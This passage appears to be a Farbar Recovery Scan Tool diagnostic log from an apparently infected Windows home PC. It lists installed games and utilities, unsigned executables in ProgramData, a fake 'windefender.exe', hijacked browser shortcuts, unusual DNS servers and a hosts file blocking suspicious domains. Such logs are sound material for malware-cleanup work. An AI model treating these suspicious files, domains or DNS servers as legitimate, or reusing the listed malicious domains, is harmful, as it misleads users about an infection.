    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7177 - Realtek Semiconductor Corp.)
    Roblox Player (HKLM-x32\...\roblox-player) (Version: - Roblox Corporation)
    Roblox Player for ADMIN (HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\roblox-player) (Version: - Roblox Corporation)
    Roblox Player for ADMIN (HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\roblox-player) (Version: - Roblox Corporation)
    Roblox Player for ADMIN (HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\roblox-player) (Version: - Roblox Corporation)
    Roblox Studio for ADMIN (HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\roblox-studio) (Version: - Roblox Corporation)
    Roblox Studio for ADMIN (HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\roblox-studio) (Version: - Roblox Corporation)
    Roblox Studio for ADMIN (HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\roblox-studio) (Version: - Roblox Corporation)
    Rockstar Games Social Club (HKLM-x32\...\{08B3869E-D282-424C-9AFC-870E04A4BA14}) (Version: 1.00.0000 - Rockstar Games)
    Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.2.3.8 - Rockstar Games)
    Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
    Super Smash Flash 2 Beta (HKLM-x32\...\{7603695C-A9FF-48D5-BE83-CD07DB80E957}_is1) (Version: 1.0.3.2 - McLeodGaming, Inc.)
    Tata Photon+ (HKLM-x32\...\Tata Photon+) (Version: 11.030.01.28.628 - Huawei Technologies Co.,Ltd)
    TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.47484 - TeamViewer)
    The Fastest Mouse Clicker for Windows version 2.1.3.7 (HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\The Fastest Mouse Clicker for Windows_is1) (Version: 2.1.3.7 - Open Source Developer Masha Novedad)
    The Fastest Mouse Clicker for Windows version 2.1.3.7 (HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\The Fastest Mouse Clicker for Windows_is1) (Version: 2.1.3.7 - Open Source Developer Masha Novedad)
    The Fastest Mouse Clicker for Windows version 2.1.3.7 (HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\The Fastest Mouse Clicker for Windows_is1) (Version: 2.1.3.7 - Open Source Developer Masha Novedad)
    Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
    Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
    VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
    Warframe (HKLM-x32\...\{5B4B99C8-B4F3-4F58-AD64-9869A4340775}) (Version: 1.0.0 - Digital Extremes)
    Warframe (HKLM-x32\...\{798E61DA-5E91-4A0B-B5B5-88C056F445BD}) (Version: 1.0.0 - Digital Extremes)
    Web Search (Yahoo! Provided) (HKLM-x32\...\{FC3414F4-ACB4-C574-1D34-B5F4CDB46674}) (Version: - )
    WinRAR 5.30 beta 6 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.6 - win.rar GmbH)
    WolfQuest (HKLM-x32\...\{9E6AD6CF-1EFF-43E4-86C4-5C00254C3D8E}) (Version: 2.5.1 - eduweb)
    YoutubeAdBlock (HKLM-x32\...\1655C0CA-7AE7-4012-8502-970C8675E5F8) (Version: 2.0.0.889 - Company Inc.) <==== ATTENTION

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
    ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-10-27] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-10-27] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
    ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2014-02-08] (NVIDIA Corporation -> NVIDIA Corporation)
    ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
    ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-10-27] (win.rar GmbH -> Alexander Roshal)
    ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-10-27] (win.rar GmbH -> Alexander Roshal)

    ==================== Shortcuts & WMI ========================

    (The entries could be listed to be restored or removed.)


    ShortcutWithArgument: C:\Users\ADMIN\Desktop\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    ShortcutWithArgument: C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    ShortcutWithArgument: C:\Users\ADMIN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> %SNP%

    ==================== Loaded Modules (Whitelisted) ==============

    2019-07-08 16:12 - 2019-07-08 15:39 - 003780096 _____ () [File not signed] C:\ProgramData\Logic Cramble\set.exe
    2019-07-08 16:12 - 2019-07-08 16:12 - 001435136 ____N () [File not signed] C:\Windows\windefender.exe
    2010-11-16 19:07 - 2010-11-16 19:07 - 000230912 _____ (Huawei Technologies Co., Ltd.) [File not signed] C:\ProgramData\DatacardService\DCSHelper.exe
    2019-07-08 16:12 - 2019-07-08 16:12 - 000307200 _____ (hxxps://system.data.sqlite.org/) [File not signed] C:\ProgramData\Logic Cramble\System.Data.SQLite.dll
    2019-07-08 16:12 - 2019-07-08 16:12 - 001008128 _____ (Robert Simpson, et al.) [File not signed] C:\ProgramData\Logic Cramble\x86\SQLite.Interop.dll
    2018-04-06 23:59 - 2018-04-06 23:59 - 002286747 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Logitech Gaming Software\LIBEAY32.dll
    2018-04-06 23:59 - 2018-04-06 23:59 - 000416627 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Logitech Gaming Software\ssleay32.dll
    2019-07-08 16:11 - 2019-07-08 16:10 - 001490432 _____ (TODO: <Company name>) [File not signed] C:\ProgramData\CloudPrinter\CloudPrinter.exe

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)

    AlternateDataStreams: C:\Users\ADMIN\Documents\Local Disk (C:).exe [0]

    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

    ==================== Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)

    IE trusted site: HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\dell.com -> dell.com
    IE trusted site: HKU\S-1-5-21-3161437104-263828448-1275724104-1000\...\roblox.com -> hxxp://www.roblox.com
    IE trusted site: HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\dell.com -> dell.com
    IE trusted site: HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\...\roblox.com -> hxxp://www.roblox.com
    IE trusted site: HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\dell.com -> dell.com
    IE trusted site: HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\...\roblox.com -> hxxp://www.roblox.com

    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2009-07-14 08:04 - 2019-07-08 16:13 - 000000292 _____ C:\Windows\system32\drivers\etc\hosts

    127.0.0.1 space1.adminpressure.space
    127.0.0.1 trackpressure.website
    127.0.0.1 htagzdownload.pw
    127.0.0.1 360devtraking.website
    127.0.0.1 room1.360dev.info
    127.0.0.1 djapp.info
    127.0.0.1 sharefolder.online
    127.0.0.1 telechargini.com
    127.0.0.1 fffffk.xyz
    127.0.0.1 smarttrackk.xyz

    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\Control Panel\Desktop\\Wallpaper -> C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\Control Panel\Desktop\\Wallpaper -> C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
    HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161658923\Control Panel\Desktop\\Wallpaper -> C:\Users\children\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
    HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161703507\Control Panel\Desktop\\Wallpaper -> C:\Users\children\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
    DNS Servers: 82.163.143.146 - 82.163.142.148
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    If an entry is included in the fixlist, it will be removed.

    MSCONFIG\startupreg: RGSC => C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe /silent
    MSCONFIG\startupreg: uTorrent => "C:\Users\ADMIN\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED
    MSCONFIG\startupreg: World of Tanks => "C:\Games\World_of_Tanks\WargamingGameUpdater.exe"
    MSCONFIG\startupreg: World of Tanks (1) => "E:\Games\World_of_Tanks\WargamingGameUpdater.exe"

    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [TCP Query User{53E00871-AA79-484E-9EA8-7A87DB5071E7}C:\users\admin\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\admin\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
    FirewallRules: [UDP Query User{55D5D113-F87C-4C7F-AD74-AE0788378F97}C:\users\admin\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\admin\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
    FirewallRules: [TCP Query User{6992A38F-AB87-4EF8-80AB-78170755B747}E:\games\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{8BF7FC4B-82B5-4D7A-99FF-031E631136D2}E:\games\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe No File
    FirewallRules: [{9EEF0AB3-9699-4A5A-B529-5973DC1AB87A}] => (Allow) E:\steam\Steam.exe No File
    FirewallRules: [{7C35F5A2-4C01-47F4-B424-1CCE50C5DF57}] => (Allow) E:\steam\Steam.exe No File
    FirewallRules: [{1D74A365-DFB6-4EA9-9A7A-8B01C2D7E1A8}] => (Allow) E:\steam\bin\cef\cef.win7\steamwebhelper.exe No File
    FirewallRules: [{C22E7A75-2302-4466-ACE0-0AA220E754D7}] => (Allow) E:\steam\bin\cef\cef.win7\steamwebhelper.exe No File
    FirewallRules: [{041B1034-0F1A-494E-87B2-1EA35155C255}] => (Allow) C:\Users\ADMIN\AppData\Local\Roblox\Versions\version-418137ce542940cc\RobloxPlayerLauncher.exe No File
    FirewallRules: [{2686234B-1B7A-4F41-9CC1-44554F1B79D3}] => (Allow) C:\Users\ADMIN\AppData\Local\Roblox\Versions\version-418137ce542940cc\RobloxPlayerLauncher.exe No File
    FirewallRules: [{D97F1693-50AA-4765-8D14-6E8D0B8D6E0C}] => (Allow) C:\Users\ADMIN\AppData\Local\Roblox\Versions\version-418137ce542940cc\RobloxPlayerLauncher.exe No File
    FirewallRules: [{7FBB6775-7F9E-467F-9DC1-7FD5BCC6707F}] => (Allow) C:\Users\ADMIN\AppData\Local\Roblox\Versions\version-418137ce542940cc\RobloxPlayerLauncher.exe No File
    FirewallRules: [TCP Query User{34F8A868-9314-4D44-B03A-FBFC9A1FEE45}C:\users\admin\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\admin\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
    FirewallRules: [UDP Query User{36AB8C58-906A-4340-8469-8B96F278B3F0}C:\users\admin\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\admin\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
    FirewallRules: [{CAB8F608-78AD-4F0A-9518-4A5B3C7DAAA1}] => (Allow) C:\Users\ADMIN\AppData\Local\Warframe\New folder\Warframe\Downloaded\Public\Warframe.exe No File
    FirewallRules: [{0E8B231A-06A7-4A11-A570-84ACC1DA4060}] => (Allow) C:\Users\ADMIN\AppData\Local\Warframe\New folder\Warframe\Downloaded\Public\Warframe.x64.exe No File
    FirewallRules: [{60E3208B-3A96-4906-A67F-09DF0DED5DAC}] => (Allow) C:\Users\ADMIN\AppData\Local\Warframe\New folder\Warframe\Downloaded\Public\Warframe.exe No File
    FirewallRules: [{04815814-4E05-4797-B5E9-81DD7347843B}] => (Allow) C:\Users\ADMIN\AppData\Local\Warframe\New folder\Warframe\Downloaded\Public\Warframe.x64.exe No File
    FirewallRules: [{6012C846-A7BA-4B58-9A27-A335BC903821}] => (Allow) C:\Users\ADMIN\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe (Digital Extremes Ltd. -> Digital Extremes)
    FirewallRules: [{665D9806-5424-4016-87B4-B1581C3E1E49}] => (Allow) C:\Users\ADMIN\AppData\Local\Warframe\New folder\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe No File
    FirewallRules: [{3863BB7C-2824-46C7-98BE-79AD57806E4A}] => (Allow) C:\Users\ADMIN\AppData\Local\Warframe\New folder\Warframe\Downloaded\Public\Warframe.exe No File
    FirewallRules: [{0D874431-9D4C-4EBF-83C6-DDA144458761}] => (Allow) C:\Users\ADMIN\AppData\Local\Warframe\New folder\Warframe\Downloaded\Public\Warframe.x64.exe No File
    FirewallRules: [{C36B2FB3-30D5-4597-AF6F-35CDDDAD3A60}] => (Allow) C:\Users\ADMIN\AppData\Local\Warframe\New folder\Warframe\Downloaded\Public\Warframe.exe No File
    FirewallRules: [{67804568-6C1B-49FC-AA5F-F2B8746F4AC3}] => (Allow) C:\Users\ADMIN\AppData\Local\Warframe\New folder\Warframe\Downloaded\Public\Warframe.x64.exe No File
    FirewallRules: [{E0576D13-0881-4A53-8420-C347A010D1D2}] => (Allow) C:\Users\ADMIN\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe (Digital Extremes Ltd. -> Digital Extremes)
    FirewallRules: [{6EADB2D1-24A8-450D-9B28-F46E7E67F850}] => (Allow) C:\Users\ADMIN\AppData\Local\Warframe\New folder\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe No File
    FirewallRules: [TCP Query User{8353623F-C94C-47EC-9C62-4AEFC00A348C}E:\games\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{43CFDCF6-3A35-4339-82DC-AAE9E82F8E78}E:\games\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.154\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{08578743-321E-49C2-9D8A-A081E779E23C}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe No File
    FirewallRules: [UDP Query User{B37541D1-FC16-4048-89DF-6658705D598F}C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe] => (Allow) C:\program files (x86)\epic games\launcher\portal\binaries\win64\epicgameslauncher.exe No File
    FirewallRules: [{C54CF984-F48B-4DBF-AE70-7319A00F364B}] => (Allow) C:\Users\ADMIN\AppData\Local\Chromium\Application\chrome.exe (The Chromium Authors) [File not signed]
    FirewallRules: [{ECEBD414-D80A-4921-9669-0874D0DAE350}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe No File
    FirewallRules: [{932DF16D-5241-4D57-8BE5-B27D6152D347}] => (Allow) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe No File
    FirewallRules: [{97B7F84C-4496-40EC-9936-2BADDAA69554}] => (Allow) C:\Users\ADMIN\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe (Tencent Technology(Shenzhen) Company Limited -> Tencent)
    FirewallRules: [{5A9CF6E7-60B8-44B4-9DA5-3CDD265EAC3F}] => (Allow) C:\Users\ADMIN\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe (Tencent Technology(Shenzhen) Company Limited -> Tencent)
    FirewallRules: [{8F973AF3-81FA-4573-9BF3-FF68671F1DCE}] => (Allow) C:\Users\ADMIN\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe (Tencent Technology(Shenzhen) Company Limited -> Tencent)
    FirewallRules: [{84350B40-F93E-4024-9B48-7398F2EAEDD6}] => (Allow) C:\Users\ADMIN\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe (Tencent Technology(Shenzhen) Company Limited -> Tencent)
    FirewallRules: [{11028145-BA2B-4241-BAE7-7D50430AF9C5}] => (Allow) C:\Users\ADMIN\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe (Tencent Technology(Shenzhen) Company Limited -> Tencent)
    FirewallRules: [{3FCF21FB-3F9D-4F11-B1D0-00DD8401B123}] => (Allow) C:\Users\ADMIN\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe (Tencent Technology(Shenzhen) Company Limited -> Tencent)
    FirewallRules: [{8E1AD5E0-133C-4A31-8596-6A7CF159CE45}] => (Allow) E:\steam\bin\cef\cef.win7x64\steamwebhelper.exe No File
    FirewallRules: [{C902914B-E930-4B04-B033-6372D2D5C74E}] => (Allow) E:\steam\bin\cef\cef.win7x64\steamwebhelper.exe No File
    FirewallRules: [TCP Query User{29D1D5DB-A859-4942-B745-28914430AE52}E:\games\rads\projects\league_client\releases\0.0.0.178\deploy\leagueclient.exe] => (Block) E:\games\rads\projects\league_client\releases\0.0.0.178\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{3F7A5732-CF75-49C3-8388-C65A7FE1B349}E:\games\rads\projects\league_client\releases\0.0.0.178\deploy\leagueclient.exe] => (Block) E:\games\rads\projects\league_client\releases\0.0.0.178\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{AF6D6B1C-BD90-4FD6-902F-4B9058804FD8}E:\games\rads\projects\league_client\releases\0.0.0.177\deploy\leagueclient.exe] => (Block) E:\games\rads\projects\league_client\releases\0.0.0.177\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{99A2E937-2970-4460-BC8B-C82951A88FEF}E:\games\rads\projects\league_client\releases\0.0.0.177\deploy\leagueclient.exe] => (Block) E:\games\rads\projects\league_client\releases\0.0.0.177\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{E151C190-D92A-4974-9303-97F90F192A20}E:\games\rads\projects\league_client\releases\0.0.0.179\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.179\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{F701B88F-88C8-43A9-8808-4D83205873C7}E:\games\rads\projects\league_client\releases\0.0.0.179\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.179\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{D6BA26F4-0B3B-45B0-B02A-0E682CD363D1}E:\games\rads\projects\league_client\releases\0.0.0.180\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.180\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{856CC152-0790-4C99-97F6-C8A047EA1EF7}E:\games\rads\projects\league_client\releases\0.0.0.180\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.180\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{3F24946B-C1A8-4BB8-880C-5A61438909BE}E:\games\rads\projects\league_client\releases\0.0.0.181\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.181\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{38456071-5A6A-4260-B75F-97679BABE706}E:\games\rads\projects\league_client\releases\0.0.0.181\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.181\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{DA4F38CF-40EA-4C26-8A4D-A5124385BCB9}E:\games\rads\projects\league_client\releases\0.0.0.183\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.183\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{5EB33B41-38D4-4FC0-B1D3-CEA6FEFD3A9A}E:\games\rads\projects\league_client\releases\0.0.0.183\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.183\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{2ED6877D-13E4-4ED3-92C0-404539337FF7}E:\games\rads\projects\league_client\releases\0.0.0.184\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.184\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{9D25B7B8-FDF2-4660-9721-6D940ECD9FF0}E:\games\rads\projects\league_client\releases\0.0.0.184\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.184\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{F6E00CD1-D421-479C-A3AD-D2897A42C8CD}E:\games\rads\projects\league_client\releases\0.0.0.185\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.185\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{D2AD396A-80B1-4351-849C-B4C7C471C977}E:\games\rads\projects\league_client\releases\0.0.0.185\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.185\deploy\leagueclient.exe No File
    FirewallRules: [{E560AD55-8B14-40F6-8FAF-4A0EC675305C}] => (Allow) C:\Users\ADMIN\AppData\Local\Programs\Opera\58.0.3135.79\opera.exe No File
    FirewallRules: [TCP Query User{F7DEC33C-3A85-49DF-9A2D-5BC49DC78168}E:\games\rads\projects\league_client\releases\0.0.0.188\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.188\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{CFA6C3FA-8D43-49C4-871C-852A437460AE}E:\games\rads\projects\league_client\releases\0.0.0.188\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.188\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{305C80FD-0E53-4BE0-B402-59C96A944CBC}E:\games\rads\projects\league_client\releases\0.0.0.189\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.189\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{2F3A864C-6310-4632-9C93-58848821017C}E:\games\rads\projects\league_client\releases\0.0.0.189\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.189\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{B54DE272-EDD3-4431-B155-CD5B20CC7DA7}E:\games\rads\projects\league_client\releases\0.0.0.190\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.190\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{C5C40436-8A8A-4907-8124-C16CF55615C6}E:\games\rads\projects\league_client\releases\0.0.0.190\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.190\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{1557552C-B52B-4C23-996F-37D34ADF6826}E:\games\rads\projects\league_client\releases\0.0.0.191\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.191\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{75422BAC-C088-4079-B05A-2EAACBF65E09}E:\games\rads\projects\league_client\releases\0.0.0.191\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.191\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{9CBB5950-28F8-4E47-A472-BB286176BCF9}E:\games\rads\projects\league_client\releases\0.0.0.192\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.192\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{85506C21-6ECB-49E4-8A92-4A9146B052EA}E:\games\rads\projects\league_client\releases\0.0.0.192\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.192\deploy\leagueclient.exe No File
    FirewallRules: [{C3B4F8C7-92BC-49B0-87A5-898E15DAE2AD}] => (Allow) E:\steam\steamapps\common\Undertale\UNDERTALE.exe No File
    FirewallRules: [{2F245DA9-F00E-4EDD-9639-A9A9495AA056}] => (Allow) E:\steam\steamapps\common\Undertale\UNDERTALE.exe No File
    FirewallRules: [TCP Query User{B707AB3F-FDDD-414F-B2F6-6F8BAA8845B0}E:\games\rads\projects\league_client\releases\0.0.0.193\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.193\deploy\leagueclient.exe No File
    FirewallRules: [UDP Query User{D4822B7A-971A-493E-B03E-D2059EECF0B0}E:\games\rads\projects\league_client\releases\0.0.0.193\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.193\deploy\leagueclient.exe No File
    FirewallRules: [TCP Query User{59D3AA21-6097-41D7-9B38-CA77B2B33008}E:\games\rads\projects\league_client\releases\0.0.0.194\deploy\leagueclient.exe] => (Allow) E:\games\rads\projects\league_client\releases\0.0.0.194\deploy\leagueclient.exe No File
